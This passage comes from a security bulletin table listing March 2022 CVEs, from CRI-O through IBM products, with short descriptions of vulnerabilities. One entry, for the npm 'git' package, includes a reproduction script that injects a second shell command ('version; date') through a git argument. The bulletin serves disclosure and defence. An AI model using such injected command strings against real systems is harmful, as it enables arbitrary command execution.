A flaw was found in CRI-O in the way it set kernel options for a pod. This issue allows anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime to achieve a container escape and arbitrary code execution as root on the cluster node, where the malicious pod was deployed. | 2022-03-16 | not yet calculated | CVE-2022-0811 MISC MISC |
| cuppacms — cuppacms | CuppaCMS v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the saveConfigData function in /classes/ajax/Functions.php. | 2022-03-15 | not yet calculated | CVE-2022-25498 MISC |
| cuppacms — cuppacms | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php. | 2022-03-15 | not yet calculated | CVE-2022-25485 MISC |
| cuppacms — cuppacms | The component /jquery_file_upload/server/php/index.php of CuppaCMS v1.0 allows attackers to upload arbitrary files and execute arbitrary code via a crafted PHP file. | 2022-03-15 | not yet calculated | CVE-2022-25495 MISC |
| cuppacms — cuppacms |
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php. | 2022-03-15 | not yet calculated | CVE-2022-25486 MISC |
| cuppacms — cuppacms |
CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function. | 2022-03-15 | not yet calculated | CVE-2022-25497 MISC |
| cvrf-csaf-converter –cvrf-csaf-converter |
CVRF-CSAF-Converter before 1.0.0-rc2 resolves XML External Entities (XXE). This leads to the inclusion of arbitrary (local) file content into the generated output document. An attacker can exploit this to disclose information from the system running the converter. | 2022-03-15 | not yet calculated | CVE-2022-27193 MISC |
| dcn_firewall — dcme-520 | DCN Firewall DCME-520 was discovered to contain an arbitrary file download vulnerability via the path parameter in the file /audit/log/log_management.php. | 2022-03-18 | not yet calculated | CVE-2022-25389 MISC |
| dcn_firewall — dcme-520 |
DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php. | 2022-03-18 | not yet calculated | CVE-2022-25390 MISC |
| delete_marker_category_delete_map_and_copy_map — delete_marker_category_delete_map_and_copy_map |
Cross-Site Request Forgery (CSRF) vulnerability affecting Delete Marker Category, Delete Map, and Copy Map functions in WP Google Map plugin (versions <= 4.2.3). | 2022-03-11 | not yet calculated | CVE-2022-25600 CONFIRM CONFIRM FEDORA FEDORA |
| eos — eos |
EOS v2.1.0 was discovered to contain a heap-buffer-overflow via the function txn_test_gen_plugin. | 2022-03-17 | not yet calculated | CVE-2022-26300 MISC |
| event_manager_and_tickets_selling_for_woocommerce — event_manager_and_tickets_selling_for_woocommerce |
The Event Manager and Tickets Selling for WooCommerce WordPress plugin before 3.5.8 does not validate and escape the post_author_gutenberg parameter before using it in a SQL statement when creating/editing events, which could allow users with a role as low as contributor to perform SQL Injection attacks | 2022-03-14 | not yet calculated | CVE-2022-0478 CONFIRM MISC |
| fasthttp — fasthttp |
The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only. | 2022-03-17 | not yet calculated | CVE-2022-21221 MISC MISC MISC MISC MISC |
| fexsrv — fexsrv |
fexsrv in F*EX (aka Frams’ Fast File EXchange) before fex-20160919_2 allows eval injection (for unauthenticated remote code execution). | 2022-03-17 | not yet calculated | CVE-2020-15591 MISC CONFIRM |
| fisco-bcos –fisco-bcos |
FISCO-BCOS release-3.0.0-rc2 was discovered to contain an issue where a malicious node, via a malicious viewchange packet, will cause normal nodes to change view excessively and stop generating blocks. | 2022-03-17 | not yet calculated | CVE-2022-26534 MISC |
| fish — fish |
fish is a command line shell. fish version 3.1.0 through version 3.3.1 is vulnerable to arbitrary code execution. git repositories can contain per-repository configuration that change the behavior of git, including running arbitrary commands. When using the default configuration of fish, changing to a directory automatically runs `git` commands in order to display information about the current repository in the prompt. If an attacker can convince a user to change their current directory into one controlled by the attacker, such as on a shared file system or extracted archive, fish will run arbitrary commands under the attacker’s control. This problem has been fixed in fish 3.4.0. Note that running git in these directories, including using the git tab completion, remains a potential trigger for this issue. As a workaround, remove the `fish_git_prompt` function from the prompt. | 2022-03-14 | not yet calculated | CVE-2022-20001 MISC CONFIRM MISC |
| flexi — flexi |
The Flexi WordPress plugin before 4.20 does not sanitise and escape various parameters before outputting them back in some pages such as the user dashboard, leading to a Reflected Cross-Site Scripting | 2022-03-14 | not yet calculated | CVE-2022-0449 MISC |
| forge — forge | Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. | 2022-03-18 | not yet calculated | CVE-2022-24772 MISC MISC CONFIRM |
| forge — forge | Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. | 2022-03-18 | not yet calculated | CVE-2022-24771 CONFIRM MISC |
| forge — forge |
Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds. | 2022-03-18 | not yet calculated | CVE-2022-24773 MISC CONFIRM MISC |
| fuxa — fuxa |
A Server-Side Request Forgery (SSRF) attack in FUXA 1.1.3 can be carried out leading to the obtaining of sensitive information from the server’s internal environment and services, often potentially leading to the attacker executing commands on the server. | 2022-03-16 | not yet calculated | CVE-2021-45851 MISC |
| fv_flowplayer_video_player — fv_flowplayer_video_player |
Authenticated (author or higher user role) SQL Injection (SQLi) vulnerability discovered in FV Flowplayer Video Player WordPress plugin (versions <= 7.5.15.727). | 2022-03-18 | not yet calculated | CVE-2022-25607 CONFIRM CONFIRM |
| gd_mylist — gd_mylist |
The GD Mylist WordPress plugin through 1.1.1 does not sanitise and escape some of its settings, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed | 2022-03-14 | not yet calculated | CVE-2022-0703 MISC |
| ge — reason_clocks | A code injection vulnerability exists in one of the webpages in GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06 that could allow an authenticated remote attacker to execute arbitrary code on the system. | 2022-03-18 | not yet calculated | CVE-2020-25197 CONFIRM CONFIRM |
| ge — reason_clocks |
By having access to the hard-coded cryptographic key for GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06, attackers would be able to intercept and decrypt encrypted traffic through an HTTPS connection. | 2022-03-18 | not yet calculated | CVE-2020-25193 CONFIRM CONFIRM |
| getgrav — grav |
Cross-site Scripting (XSS) – Stored in GitHub repository getgrav/grav prior to 1.7.31. | 2022-03-15 | not yet calculated | CVE-2022-0970 MISC CONFIRM |
| git — git |
All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require(“git”).Git; var repo = new Git(“repo-test”); var user_input = “version; date”; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run exploit.js: node exploit.js. You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work. | 2022-03-17 | not yet calculated | CVE-2021-23632 MISC |
| gitea — gitea |
The avatar middleware in Gitea before 1.13.6 allows Directory Traversal via a crafted URL. | 2022-03-15 | not yet calculated | CVE-2021-29134 MISC MISC |
| glewlwyd — sso_server |
scheme/webauthn.c in Glewlwyd SSO server 2.x before 2.6.2 has a buffer overflow associated with a webauthn assertion. | 2022-03-18 | not yet calculated | CVE-2022-27240 MISC MISC |
| go-ethereum — go-ethereum |
Go-Ethereum v1.10.9 was discovered to contain an issue which allows attackers to cause a denial of service (DoS) via sending an excessive amount of messages to a node. This is caused by missing memory in the component /ethash/algorithm.go. | 2022-03-17 | not yet calculated | CVE-2021-42219 MISC |
| golang — go |
golang.org/x/crypto/ssh before 0.0.0-20220314234659-1baeb1ce4c0b in Go through 1.16.15 and 1.17.x through 1.17.8 allows an attacker to crash a server in certain circumstances involving AddHostKey. | 2022-03-18 | not yet calculated | CVE-2022-27191 CONFIRM MISC |
| google — android | In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-204585345References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39722 MISC |
| google — android | In usb_gadget_giveback_request of core.c, there is a possible use after free out of bounds read due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-161010552References: Upstream kernel | 2022-03-16 | not yet calculated | CVE-2021-39792 MISC |
| google — android | Product: AndroidVersions: Android kernelAndroid ID: A-209014813References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39723 MISC |
| google — android | Product: AndroidVersions: Android kernelAndroid ID: A-208229524References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39737 MISC |
| google — android | In TuningProviderBase::GetTuningTreeSet of tuning_provider_base.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205753190References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39724 MISC |
| google — android | In gasket_free_coherent_memory_all of gasket_page_table.c, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151454974References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39725 MISC |
| google — android | In cd_ParseMsg of cd_codec.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-181782896References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39726 MISC |
| google — android | In copy_io_entries of lwis_ioctl.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205992503References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39732 MISC |
| google — android | In eicPresentationRetrieveEntryValue of acropora/app/identity/libeic/EicPresentation.c, there is a possible information disclosure due to a race condition. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-196388042References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39727 MISC |
| google — android | In prepare_io_entry and prepare_response of lwis_ioctl.c and lwis_periodic_io.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205995773References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39736 MISC |
| google — android | In amcs_cdev_unlocked_ioctl of audiometrics.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206128522References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39733 MISC |
| google — android | In sendMessage of OneToOneChatImpl.java (? TBD), there is a possible way to send an RCS message without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-208650395References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39734 MISC |
| google — android | In the TitanM chip, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-202006191References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39729 MISC |
| google — android | In kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210470189References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39793 MISC |
| google — android | In TBD of TBD, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-206472503References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39730 MISC |
| google — android | In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205036834References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39731 MISC |
| google — android | In gasket_alloc_coherent_memory of gasket_page_table.c, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-151455484References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39735 MISC |
| google — android | Product: AndroidVersions: Android kernelAndroid ID: A-206977562References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39716 MISC |
| google — android | In onCreate of RequestManageCredentials.java, there is a possible way for a third party app to install certificates without user approval due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-205150380 | 2022-03-16 | not yet calculated | CVE-2021-39702 MISC |
| google — android | In multiple functions of odsign_main.cpp, there is a possible way to persist system attack due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-206090748 | 2022-03-16 | not yet calculated | CVE-2021-39689 MISC |
| google — android | In various setup methods of the USB gadget subsystem, there is a possible out of bounds write due to an incorrect flag check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210292376References: Upstream kernel | 2022-03-16 | not yet calculated | CVE-2021-39685 MISC |
| google — android | In setDisplayPadding of WallpaperManagerService.java, there is a possible way to cause a persistent DoS due to improper input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-204316511 | 2022-03-16 | not yet calculated | CVE-2021-39690 MISC |
| google — android | In onCreate of SetupLayoutActivity.java, there is a possible way to setup a work profile bypassing user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209611539 | 2022-03-16 | not yet calculated | CVE-2021-39692 MISC |
| google — android | In onUidStateChanged of AppOpsService.java, there is a possible way to access location without a visible indicator due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-208662370 | 2022-03-16 | not yet calculated | CVE-2021-39693 MISC |
| google — android | In ih264d_parse_decode_slice of ih264d_parse_slice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-205702093 | 2022-03-16 | not yet calculated | CVE-2021-39667 MISC |
| google — android | In parse of RoleParser.java, there is a possible way for default apps to get permissions explicitly denied by the user due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-202312327 | 2022-03-16 | not yet calculated | CVE-2021-39694 MISC |
| google — android | In createOrUpdate of BasePermission.java, there is a possible permission bypass due to a logic error in the code. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-209607944 | 2022-03-16 | not yet calculated | CVE-2021-39695 MISC |
| google — android | In checkFileUriDestination of DownloadProvider.java, there is a possible way to bypass external storage private directories protection due to a missing permission check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-200813547 | 2022-03-16 | not yet calculated | CVE-2021-39697 MISC |
| google — android | In aio_poll_complete_work of aio.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-185125206References: Upstream kernel | 2022-03-16 | not yet calculated | CVE-2021-39698 MISC |
| google — android | In serviceConnection of ControlsProviderLifecycleManager.kt, there is a possible way to keep service running in foreground without notification or permission due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-12Android ID: A-212286849 | 2022-03-16 | not yet calculated | CVE-2021-39701 MISC |
| google — android | In TBD of TBD, there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-195726151References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39721 MISC |
| google — android | In updateState of UsbDeviceManager.java, there is a possible unauthorized access of files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-207057578 | 2022-03-16 | not yet calculated | CVE-2021-39703 MISC |
| google — android | In deleteNotificationChannelGroup of NotificationManagerService.java, there is a possible way to run foreground service without user notification due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-209965481 | 2022-03-16 | not yet calculated | CVE-2021-39704 MISC |
| google — android | In getNotificationTag of LegacyVoicemailNotifier.java, there is a possible leak of ICCID due to a permissions bypass. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-186026746 | 2022-03-16 | not yet calculated | CVE-2021-39705 MISC |
| google — android | In onResume of CredentialStorage.java, there is a possible way to cleanup content of credentials storage due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200164168 | 2022-03-16 | not yet calculated | CVE-2021-39706 MISC |
| google — android | In onReceive of AppRestrictionsFragment.java, there is a possible way to start a phone call without permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-200688991 | 2022-03-16 | not yet calculated | CVE-2021-39707 MISC |
| google — android | In __show_regs of process.c, there is a possible leak of kernel memory and addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-178379135References: Upstream kernel | 2022-03-16 | not yet calculated | CVE-2021-39715 MISC |
| google — android | Product: AndroidVersions: Android kernelAndroid ID: A-207433926References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39720 MISC |
| google — android | In lwis_top_register_io of lwis_device_top.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205995178References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39719 MISC |
| google — android | In ProtocolStkProactiveCommandAdapter::Init of protocolstkadapter.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205035540References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39718 MISC |
| google — android | In gatt_process_notification of gatt_cl.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-206128341 | 2022-03-16 | not yet calculated | CVE-2021-39708 MISC |
| google — android | In iaxxx_btp_write_words of iaxxx-btp.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-198653629References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39717 MISC |
| google — android | In ion_buffer_kmap_get of ion.c, there is a possible use-after-free due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-205573273References: Upstream kernel | 2022-03-16 | not yet calculated | CVE-2021-39714 MISC |
| google — android | Product: AndroidVersions: Android kernelAndroid ID: A-173788806References: Upstream kernel | 2022-03-16 | not yet calculated | CVE-2021-39713 MISC |
| google — android | In TBD of TBD, there is a possible user after free vulnerability due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-176918884References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39712 MISC |
| google — android | In bpf_prog_test_run_skb of test_run.c, there is a possible out of bounds read due to Incorrect Size Value. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-154175781References: Upstream kernel | 2022-03-16 | not yet calculated | CVE-2021-39711 MISC |
| google — android | Product: AndroidVersions: Android kernelAndroid ID: A-202160245References: N/A | 2022-03-16 | not yet calculated | CVE-2021-39710 MISC |
| google — android | In sendSipAccountsRemovedNotification of SipAccountRegistry.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12Android ID: A-208817618 | 2022-03-16 | not yet calculated | CVE-2021-39709 MISC |
| google — android | In several functions of binder.c, there is a possible way to represent the wrong domain to SELinux due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-200688826References: Upstream kernel | 2022-03-16 | not yet calculated | CVE-2021-39686 MISC |
| google — android |
In Package Manger, there is a possible permanent denial of service due to resource exhaustion. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-67862680 | 2022-03-16 | not yet calculated | CVE-2021-39624 MISC |
| google — android |
In NotificationStackScrollLayout of NotificationStackScrollLayout.java, there is a possible way to bypass Factory Reset Protections. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-193149550 | 2022-03-16 | not yet calculated | CVE-2021-0957 MISC |
| google — sa360-webquery-bigquery |
A local attacker could read files from some other users’ SA360 reports stored in the /tmp folder during staging process before the files are loaded in BigQuery. We recommend upgrading to version 1.0.3 or above. | 2022-03-18 | not yet calculated | CVE-2021-22571 CONFIRM CONFIRM |
| gpac — gpac | GPAC 1.0.1 is affected by a heap-based buffer overflow in SFS_AddString () at bifs/script_dec.c. | 2022-03-14 | not yet calculated | CVE-2022-24578 MISC |
| gpac — gpac |
GPAC 1.0.1 is affected by a NULL pointer dereference in gf_utf8_wcslen (). | 2022-03-14 | not yet calculated | CVE-2022-24577 MISC |
| gradio — gradio |
`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer’s computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user’s computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs. | 2022-03-17 | not yet calculated | CVE-2022-24770 CONFIRM MISC MISC |
| gradle_enterprise — gradle_enterprise | Gradle Enterprise before 2021.4.3 relies on cleartext data transmission in some situations. It uses Keycloak for identity management services. During the sign-in process, Keycloak sets browser cookies that effectively provide remember-me functionality. For backwards compatibility with older Safari versions, Keycloak sets a duplicate of the cookie without the Secure attribute, which allows the cookie to be sent when accessing the location that cookie is set for via HTTP. This creates the potential for an attacker (with the ability to impersonate the Gradle Enterprise host) to capture the login session of a user by having them click an http:// link to the server, despite the real server requiring HTTPS. | 2022-03-16 | not yet calculated | CVE-2022-27225 MISC |
| gradle_enterprise — gradle_enterprise |
In Gradle Enterprise before 2021.4.2, the default built-in build cache configuration allowed anonymous write access. If this was not manually changed, a malicious actor with network access to the build cache could potentially populate it with manipulated entries that execute malicious code as part of a build. As of 2021.4.2, the built-in build cache is inaccessible-by-default, requiring explicit configuration of its access-control settings before it can be used. (Remote build cache nodes are unaffected as they are inaccessible-by-default.) | 2022-03-17 | not yet calculated | CVE-2022-25364 MISC MISC |
| hestiacp — hestiacp |
Reflected Cross-site Scripting (XSS) Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.11. | 2022-03-16 | not yet calculated | CVE-2022-0986 MISC CONFIRM |
| hms — hms | HMS v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in department.php. | 2022-03-15 | not yet calculated | CVE-2022-25490 MISC |
| hms — hms | HMS v1.0 was discovered to contain a SQL injection vulnerability via the editid parameter in appointment.php. | 2022-03-15 | not yet calculated | CVE-2022-25491 MISC |
| hms — hms | HMS v1.0 was discovered to contain a SQL injection vulnerability via the medicineid parameter in ajaxmedicine.php. | 2022-03-15 | not yet calculated | CVE-2022-25492 MISC |
| hms — hms |
HMS v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via treatmentrecord.php. | 2022-03-15 | not yet calculated | CVE-2022-25493 MISC |
| htmldoc — htmldoc | A flaw was found in htmldoc before v1.9.12. Heap buffer overflow in pspdf_prepare_outpages(), in ps-pdf.cxx may lead to execute arbitrary code and denial of service. | 2022-03-16 | not yet calculated | CVE-2021-23165 MISC MISC MISC MISC |
| htmldoc — htmldoc |
A flaw was found in htmldoc in v1.9.12. Double-free in function pspdf_export(),in ps-pdf.cxx may result in a write-what-where condition, allowing an attacker to execute arbitrary code and denial of service. | 2022-03-16 | not yet calculated | CVE-2021-23158 MISC MISC MISC |
| httpie — httpie |
Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository httpie/httpie prior to 3.1.0. | 2022-03-15 | not yet calculated | CVE-2022-0430 MISC CONFIRM |
| ibm — big_sql_and_cloud_pak_for_data |
IBM Big SQL on IBM Cloud Pak for Data 7.1.0, 7.1.1, 7.2.0, and 7.2.3 could allow an authenticated user with appropriate permissions to obtain sensitive information by bypassing data masking rules using a CREATE TABLE SELECT statement. IBM X-Force ID: 220480. | 2022-03-14 | not yet calculated | CVE-2022-22353 CONFIRM XF |
| ibm — business_automation_workflow |
IBM Business Automation Workflow 18.0, 19.0, 20.0, and 21.0 and IBM Business Process Manager 8.5 and 8.6 stores user credentials in plain clear text which can be read by a lprivileged user. IBM X-Force ID: 214346. | 2022-03-18 | not yet calculated | CVE-2021-39046 XF CONFIRM |
| ibm — data_virtualization |
IBM Data Virtualization on Cloud Pak for Data 1.3.0, 1.4.1, 1.5.0, 1.7.1 and 1.7.3 could allow an authorized user to bypass data masking rules and obtain sensitve information. IBM X-Force ID: 212620. | 2022-03-14 | not yet calculated | CVE-2021-38971 XF CONFIRM |
| ibm — engineering_requirements_quality_assistant |
IBM Engineering Requirements Quality Assistant prior to 3.1.3 could allow an authenticated user to cause a denial of service. IBM X-Force ID: 207413. | 2022-03-18 | not yet calculated | CVE-2021-29899 CONFIRM XF |
| ibm — engineering_workflow_management |
IBM Engineering Workflow Management 7.0, 7.0.1, and 7.0.2 and IBM Rational Team Concert 6.0.6 and 6.0.0.1 could allow an authenticated user to obtain sensitive information about build definitions. IBM X-Force ID: 192707. | 2022-03-15 | not yet calculated | CVE-2020-4989 CONFIRM XF |
| ibm — spectrum_copy_data_management | IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214534. | 2022-03-14 | not yet calculated | CVE-2021-39055 CONFIRM XF |
| ibm — spectrum_copy_data_management |
IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 220038 | 2022-03-14 | not yet calculated | CVE-2022-22344 CONFIRM XF |
| ibm — spectrum_copy_data_management |
IBM Spectrum Copy Data Management 2.2.0.0 through 2.2.14.3 is vulnerable to server-side request forgery, caused by improper input of application server registration function. A remote attacker could exploit this vulnerability using the host address and port fields of the application server registration form in the portal UI to enumerate and attack services that are running on those hosts. IBM X-Force ID: 214441. | 2022-03-14 | not yet calculated | CVE-2021-39051 CONFIRM XF |
| ibm — spectrum_protect_operations_center |
IBM Spectrum Protect Operations Center 8.1.0.000 through 8.1.13.xxx is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 220048. | 2022-03-14 | not yet calculated | CVE-2022-22346 CONFIRM XF |
| ibm — spectrum_protect_operations_centers |
